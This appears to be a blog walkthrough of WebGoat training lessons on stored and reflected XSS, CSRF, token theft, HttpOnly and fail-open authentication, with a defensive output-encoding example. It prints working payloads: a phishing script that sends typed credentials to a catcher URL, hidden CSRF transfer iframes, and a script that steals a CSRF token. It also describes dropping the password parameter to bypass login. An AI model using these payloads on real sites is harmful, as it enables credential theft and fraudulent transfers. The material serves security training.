Web Security XSS
Simple reflected XSS phishing demo
</form><script>
function hack() {
  var XSSImage = new Image();
  XSSImage.src = "http://localhost:8080/WebGoat/catcher?PROPERTY=yes&user=" + document.phish.user.value + "&password=" + document.phish.pass.value + "";
  alert("Had this been a real attack... Your credentials were just stolen. User Name = " + document.phish.user.value + " Password = " + document.phish.pass.value);
}
</script>
<form name="phish"><br><br><HR><H2>This feature requires account login:</H2><br><br>Enter Username:<br><input type="text" name="user"><br>Enter Password:<br><input type="password" name="pass"><br><input type="submit" name="login" value="login" onclick="hack()"></form><br><br><HR>
Enter the above code into the text box. The XSS renders a fake login form inside the page, which tricks the user into entering an account name and password; the script then sends both to the catcher URL.
Cross-Site Scripting (XSS) - LAB: Cross Site Scripting
This lesson is a systematic introduction to XSS.
Stage 1-4
These four stages cover stored XSS. The main steps are as follows:
- Tom's profile is editable, and Jerry, who works in HR, can view Tom's profile.
- Tom edits his profile, puts the XSS code into it, and it is stored in the database.
- When Jerry views Tom's profile, bam, he is hit by the payload.
Stages 2 and 4 then give two ways to fix the XSS.
The first is to validate and encode the input; the second is to encode the output, which is divided into JS encoding and HTML encoding. Stages 1-4 as a whole cannot be completed, because there is no solution and the XSS already seems to be in its fixed state ... I feel this lesson is also broken ...
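The two output encodings the lesson names, applied to a stored profile field as it is written back into the page. This is an added example, not WebGoat's own code; the `renderProfile*` functions and the `<td>`/inline-script layout are assumptions standing in for whatever the lesson's page actually emits:

```javascript
// Added example, not WebGoat's own code: the two output encodings the lesson names,
// applied when a stored profile field is written back into the page.

// HTML-encode: for text written between tags or inside a quoted attribute value.
function htmlEncode(str) {
  const map = { '&': '&amp;', '<': '&lt;', '>': '&gt;', '"': '&quot;', "'": '&#x27;' };
  return String(str).replace(/[&<>"']/g, (ch) => map[ch]);
}

// JS-encode: for text written inside a JavaScript string literal. Every character
// outside [A-Za-z0-9] becomes \xHH (or \uHHHH), so quotes and </script> cannot break out.
function jsEncode(str) {
  return String(str).replace(/[^A-Za-z0-9]/g, (ch) => {
    const code = ch.charCodeAt(0);
    return code < 0x100
      ? '\\x' + code.toString(16).padStart(2, '0')
      : '\\u' + code.toString(16).padStart(4, '0');
  });
}

// Vulnerable rendering (the Stage 1 behaviour): the stored text is concatenated raw,
// so a <script> element stored in the profile becomes live markup for Jerry.
function renderProfileVulnerable(profileText) {
  return '<td>' + profileText + '</td>';
}

// Hardened rendering (the Stage 2/4 fix): encode for the context the value lands in,
// HTML encoding for the cell text, JS encoding for the inline string literal.
function renderProfileSafe(profileText) {
  return '<td>' + htmlEncode(profileText) + '</td>' +
    "<script>var profile = '" + jsEncode(profileText) + "';</script>";
}

// Constructed sample input shaped like a stored-XSS payload.
const SAMPLE = '<script>alert("stage1")</script>';

if (typeof require !== 'undefined' && require.main === module) {
  console.log(renderProfileVulnerable(SAMPLE)); // script element survives intact
  console.log(renderProfileSafe(SAMPLE));       // only &lt;script&gt; and \x3cscript\x3e remain
}
```

The point to take from the two renderers is that the encoding is chosen by destination context, not by input: the same stored string needs `htmlEncode` when it lands in the HTML body and `jsEncode` when it lands inside a script string, and validating on input does not remove the need for either.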
Stage 5-6
Here is the reflected XSS tutorial. It says that the SearchStaff page has a reflected XSS that code can be injected into, but I could not reproduce it; it may also be broken ... Stage 6 has to be done in developer mode and I do not know how to do it.
Cross-Site Scripting (XSS) - Stored XSS Attacks
Describes one of the most typical examples of stored XSS: the message board.
- The message board accepts any input
- There is no input/output encoding, resulting in XSS
- User A posts a malicious message
- When user B clicks in, user A's message is displayed automatically and the XSS fires
Cross-Site Scripting (XSS) - Reflected XSS Attacks
A typical reflected XSS lesson: the "Enter your three digit access code" input box has a reflected XSS vulnerability.
Cross-Site Scripting (XSS) - Cross Site Request Forgery (CSRF)
Here is an example that combines stored XSS and CSRF. CSRF means forging a request under the victim's existing login; the code forges the request, and the lesson explains this in detail. Here the malicious CSRF code is placed on the web page through stored XSS, entered via the message input:
<iframe src="attack?Screen=284&menu=900&transferFunds=5000"></iframe>
You can see that the stored XSS makes the page load the transfer page. If you do not want the victim to notice this page,
<iframe src="attack?Screen=284&menu=900&transferFunds=5000" width="1" height="1"></iframe>
hide it by setting the width and height to 1 pixel.
Cross-Site Scripting (XSS) - CSRF Prompt By-Pass
This uses CSRF to perform a fraudulent transfer, leaving malicious code as follows:
<iframe src="attack?Screen=282&menu=900&transferFunds=5000" id="myFrame" frameborder="1" marginwidth="0" marginheight="0" scrolling="yes" onload="document.getElementById('frame2').src='attack?Screen=282&menu=900&transferFunds=CONFIRM';"></iframe>
<iframe id="frame2" frameborder="1" marginwidth="0" marginheight="0" scrolling="yes"></iframe>
- The first iframe makes a transfer of 5000
- When that iframe finishes loading, its onload grabs the second iframe and has it load the transfer confirmation, which is the same as pressing the confirm button
- So the second iframe with id="frame2" has to be constructed in advance
According to the lesson, one effective way to prevent CSRF is a token, but tokens can be stolen when they are managed loosely.
Cross-Site Scripting (XSS) -
A demo of CSRF after stealing the token:
<script>
var tokenSuffix;
function readFrame1() {
  var frameDoc = document.getElementById("frame1").contentDocument;
  var form = frameDoc.getElementsByTagName("form")[0];
  tokenSuffix = "&CSRFToken=" + form.CSRFToken.value;
  loadFrame2();
}
function loadFrame2() {
  var testFrame = document.getElementById("frame2");
  testFrame.src = "attack?Screen=278&menu=900&transferFunds=5000" + tokenSuffix;
}
</script>
<iframe src="attack?Screen=278&menu=900&transferFunds=main" onload="readFrame1();" id="frame1" frameborder="1" marginwidth="0" marginheight="0" scrolling="yes"></iframe>
<iframe id="frame2" frameborder="1" marginwidth="0" marginheight="0" width="800" scrolling="yes"></iframe>
- First load the main page in the first iframe and read the token out of its form
- Then load the transfer page in the second iframe to send the CSRF transfer request with that token
Cross-Site Scripting (XSS) - HttpOnly Test
This tests the effect of HttpOnly on how third parties can handle cookies: a cookie marked HttpOnly cannot be read by JS, so the session ID and token are best placed in cookies carrying this flag.
But there is a question here: if the user can choose a different DOM option that switches HttpOnly off, is it possible to trick the user into switching it off first ... Or is this only for the purpose of the exercise, and the HttpOnly effect is simulated?
Improper Error Handling - Fail Open Authentication Scheme
This chapter is mainly about error handling: incomplete handling of errors can create vulnerabilities, as here.
- Enter the WebGoat account name
- Then enter any password
- Intercept the request
- Delete the password parameter
Login still succeeds, so the error handling for the case where the code cannot read the password parameter is not sufficient.
http://blog.csdn.net/biyukai88/article/details/52251805